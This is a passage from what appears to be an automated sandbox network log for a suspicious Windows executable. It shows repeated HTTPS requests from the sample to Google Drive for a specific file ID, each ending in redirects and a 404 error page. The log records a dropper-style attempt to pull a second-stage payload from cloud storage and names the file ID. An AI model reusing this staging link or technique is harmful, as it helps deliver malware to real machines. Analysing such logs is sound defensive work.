                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:35:56 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-cf6_GHo-5Pu2mtyymmWuuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:35:56 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 32 61 4c 71 44 5f 58 38 68 44 44 47 79 7a 64 64 6e 4e 62 33 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="52aLqD_X8hDDGyzddnNb3g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          42192.168.11.2049788142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:36:06 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:36:06 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:36:06 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-O6vDTEKPHkbITwrsRYmaZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          43192.168.11.2049789142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:36:07 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:36:07 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFIdbgTPSAVtfR4XjmO_v3WA6bPvV6XjRtUcKAea1tg9dsK3ECRk2pI-yjq12m49LcgZdGyN
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:36:07 GMT
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: script-src 'nonce-khC-4aYosW-NtjAkFBbzkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:36:07 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 77 6e 53 6e 36 66 4c 34 4e 55 5f 50 6f 5a 73 48 2d 73 77 53 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WwnSn6fL4NU_PoZsH-swSA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          44192.168.11.2049790142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:36:18 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:36:19 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:36:18 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-WT6SRMw2JIa0va5513nRIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          45192.168.11.2049791142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:36:19 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:36:19 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFIdbgTxrKg_PRcbJuMiP9sWAXU45uDqcUXmDcebcjGHi5kR3BhScNA5rP936s04pD8kdGx7
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:36:19 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: script-src 'nonce-dsAg3u2m1n6G9y7LcDmY-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:36:19 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 4f 74 42 34 65 67 4d 74 78 47 53 48 75 76 69 4f 49 73 6d 48 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bOtB4egMtxGSHuviOIsmHA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          46192.168.11.2049792142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:36:29 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:36:30 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:36:30 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-RJVXOAvbVr4X4TpUcaIRyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          47192.168.11.2049793142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:36:30 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:36:30 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC5fZLTZMvvAK6xJxCXVMWo0ALSuyc8p4cXLMX1B9WfDre_7bi_eVaENdNN0gvaULsE5
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:36:30 GMT
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: script-src 'nonce--MbIMg8M0Mr0djtKj4o1Nw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:36:30 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 47 6c 56 70 64 69 65 6e 32 68 4c 78 4f 32 76 32 77 38 36 75 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LGlVpdien2hLxO2v2w86uQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          48192.168.11.2049794142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:36:41 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:36:41 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:36:41 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-j7SfN3v38IA6e10nhmPypg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
